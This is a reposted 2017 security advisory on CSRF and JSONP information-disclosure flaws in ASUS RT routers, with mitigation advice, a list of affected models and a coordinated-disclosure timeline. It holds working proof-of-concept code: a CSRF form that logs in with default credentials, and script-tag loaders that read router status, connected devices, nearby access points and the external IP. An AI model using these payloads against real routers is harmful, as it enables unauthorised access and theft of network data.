Packet Storm: PACKETSTORM:142460 (Yakov Shafranovich, May 10, 2017)

ASUS Routers CSRF / Information Disclosure

2017-05-10 00:00:00
Yakov Shafranovich
packetstormsecurity.com

EPSS: 0.002 (Low), Percentile: 55.3%

`[Original post here:  
https://wwws.nightwatchcybersecurity.com/2017/05/09/multiple-vulnerabilities-in-asus-routers/]  
  
Summary  
  
Various models of ASUS RT routers have several CSRF vulnerabilities  
allowing malicious sites to login and change settings in the router;  
multiple JSONP vulnerabilities allowing exfiltration of router data  
and an XML endpoint revealing WiFi passwords. Most of these issues  
have been fixed by Asus in the March 2017 firmware update under  
v3.0.0.4.380.7378. One issue (JSONP information disclosure) remains  
unfixed since the vendor doesn't consider it to be a security threat.  
CVE-2017-5891 has been assigned to the CSRF issues, and CVE-2017-5892  
to cover the non-CSRF issues.  
  
Vulnerability Details  
  
RT routers from ASUS, like many other routers, come with a built-in web  
interface accessible over the local network but normally not  
accessible via the Internet. We discovered multiple issues within that  
web interface that can facilitate attacks on the router either  
via a malicious site visited by a user on the same network, or a  
malicious mobile or desktop application running on the same network.  
For the CSRF vulnerabilities, a user would need to visit a malicious  
site which can try to login and change settings. For the JSONP  
vulnerabilities, a website can load the JSONP endpoints via SCRIPT  
tags as long as a matching function name is defined on that site. The  
XML endpoint requires a mobile or desktop application to exploit.  
NOTE: all of these assume that the attacker knows the local IP address  
of the router. This could probably be guessed or be determined via  
JavaScript APIs like WebRTC. For desktop and mobile applications,  
determination of the gateway address should be trivial to implement.  
  
Issue #1 - Login Page CSRF  
  
The login page for the router doesn't have any kind of CSRF  
protection, thus allowing a malicious website to submit a login  
request to the router without the user's knowledge. Obviously, this  
only works if the site either knows the username and password of the  
router OR the user hasn't changed the default credentials ("admin /  
admin"). To exploit, submit the base64-encoded username and password  
as a "login_authorization" form post to the "/login.cgi" URL of the  
router.  
  
Example of a form that can exploit this issue (uses default credentials):  
  
<form action="http://192.168.1.1/login.cgi"  
method="post" target="_blank">  
<input name="login_authorization" type="text"  
value="YWRtaW46YWRtaW4=" />  
<input type="submit" /></form>  
  
Issue #2 - Save Settings CSRF  
  
The various pages within the interface that can save settings do not  
have CSRF protection. That means that a malicious site, once logged in  
as described above would be able to change any settings in the router  
without the user's knowledge.  
  
NOTE: We have not been able to exploit this issue consistently.  
  
Issue #3 - JSONP Information Disclosure Without Login  
  
Two JSONP endpoints exist within the router which allow detection of  
which ASUS router is running and some information disclosure. No login  
is required to the router. The vendor doesn't consider these endpoints  
a security threat.  
  
The endpoints are as follows:  
  
/findasus.json  
  
Returns the router model name, SSID name and the local IP address of the router  
  
iAmAlive([{modelName: "XXX", ssid: "YYY", ipAddr: "ZZZZ"}])  
  
/httpd_check.json  
  
Returns: {"alive": 1, "isdomain": 0}  
  
Exploit code as follows:  
  
// Callback name expected by /findasus.json  
function iAmAlive(payload) {  
  window.alert("Result returned: " + JSON.stringify(payload));  
}  
// Load the endpoint via a SCRIPT tag so the router's response runs as script  
function alert1() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/findasus.json';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
function alert2() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/httpd_check.json';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
Issue #4 - JSONP Information Disclosure, Login Required  
  
There exist multiple JSONP endpoints within the router interface that  
reveal various data from the router.  
  
Below is a list of endpoints and exploit code:  
  
/status.asp - Network Information  
  
function getstatus() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/status.asp';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
// The loaded script defines the wanlink_* functions as globals  
function show_wanlink_info() {  
  var obj = {};  
  obj.status = wanlink_status();  
  obj.statusstr = wanlink_statusstr();  
  obj.wanlink_type = wanlink_type();  
  obj.wanlink_ipaddr = wanlink_ipaddr();  
  obj.wanlink_xdns = wanlink_xdns();  
  window.alert(JSON.stringify(obj));  
}  
  
<br/>  
<button onClick="getstatus()">Load Status script</button>  
<button onClick="show_wanlink_info()">Show wanlink info</button>  
<br/><br/>  
  
/wds_aplist_2g.asp - Surrounding access points, 2.4 GHz band  
  
/wds_aplist_5g.asp - Surrounding access points, 5 GHz band  
  
  
function getwds_2g() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/wds_aplist_2g.asp';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
function getwds_5g() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/wds_aplist_5g.asp';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getwds_2g()">Load 2G info</button>  
<button onClick="getwds_5g()">Load 5G info</button>  
<button onClick="window.alert(JSON.stringify(wds_aplist))">Show AP info</button>  
<br/><br/>  
  
/update_networkmapd.asp - Network map of devices on the network  
  
function getmap() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/update_networkmapd.asp';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getmap()">Load Network map</button>  
<button onClick="window.alert(JSON.stringify(fromNetworkmapd))">Show Map</button>  
<br/><br/>  
  
/update_clients.asp - Origin data  
  
function getorigin() {  
  originData = [];  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/update_clients.asp';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getorigin()">Load Origin</button>  
<button onClick="window.alert(JSON.stringify(originData))">Show Origin</button>  
  
/get_real_ip.asp - External IP address  
  
function getrealip() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/get_real_ip.asp';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getrealip()">Load IP</button>  
<button onClick="window.alert(JSON.stringify(wan0_realip_ip))">Show IP</button>  
  
/get_webdavInfo.asp - WebDAV information  
  
function getwebdav() {  
  var script = document.createElement('script');  
  script.src = 'http://192.168.1.1/get_webdavInfo.asp';  
  document.getElementsByTagName('head')[0].appendChild(script);  
}  
  
<br/>  
<button onClick="getwebdav()">Load WebDav</button>  
<button onClick="window.alert(JSON.stringify(pktInfo))">Show Info 1</button>  
<button onClick="window.alert(JSON.stringify(webdavInfo))">Show Info 2</button>  
<br/><br/>  
  
Issue #5 - XML Endpoint Reveals WiFi Passwords  
  
An XML endpoint exists in the router which reveals the WiFi password  
to the router but to fully exploit this issue, it would require a  
mobile or desktop application running on the local network since XML  
cannot be loaded cross origin in the browser. This endpoint can be  
accessed at the following URL and requires login:  
  
[router IP]/WPS_info.xml  
  
Mitigation Steps / Vendor Response  
  
Users should change the default credentials and apply the latest  
firmware released by ASUS, version v3.0.0.4.380.7378 or higher. There  
is no mitigation available for the issue #3 - JSONP information  
disclosure without login.  
  
Affected models include the following ASUS routers:  
  
RT-AC55U  
RT-AC56R  
RT-AC56S  
RT-AC56U  
RT-AC66U  
RT-AC88U  
RT-AC66R  
RT-AC66U  
RT-AC66W  
RT-AC68W  
RT-AC68P  
RT-AC68R  
RT-AC68U  
RT-AC87R  
RT-AC87U  
RT-AC51U  
RT-AC53U  
RT-AC1900P  
RT-AC3100  
RT-AC3200  
RT-AC5300  
RT-N11P  
RT-N12 (D1 version only)  
RT-N12+  
RT-N12E  
RT-N18U  
RT-N56U  
RT-N66R  
RT-N66U (B1 version only)  
RT-N66W  
  
References  
  
CVE-IDs: CVE-2017-5891 and CVE-2017-5892  
CERT/CC Tracking # VR-627  
  
Credits  
  
We would like to thank CERT/CC for helping to coordinate the  
disclosure process. This advisory was written by Yakov Shafranovich.  
  
Timeline  
  
2017-01-21: Initial contact with the vendor  
2017-01-23: Initial contact with CERT/CC  
2017-02-05: Vulnerability details and POC code provided to the vendor,  
CVEs requested  
2017-02-10: Vulnerability analysis received from the vendor  
2017-02-12: Beta firmware provided by the vendor to test fixes  
2017-02-12: Vendor fixes confirmed  
2017-03-31: Fixed firmware released publicly by the vendor  
2017-05-01: Draft advisory shared with the vendor and CERT/CC  
2017-05-09: Public disclosure  
`
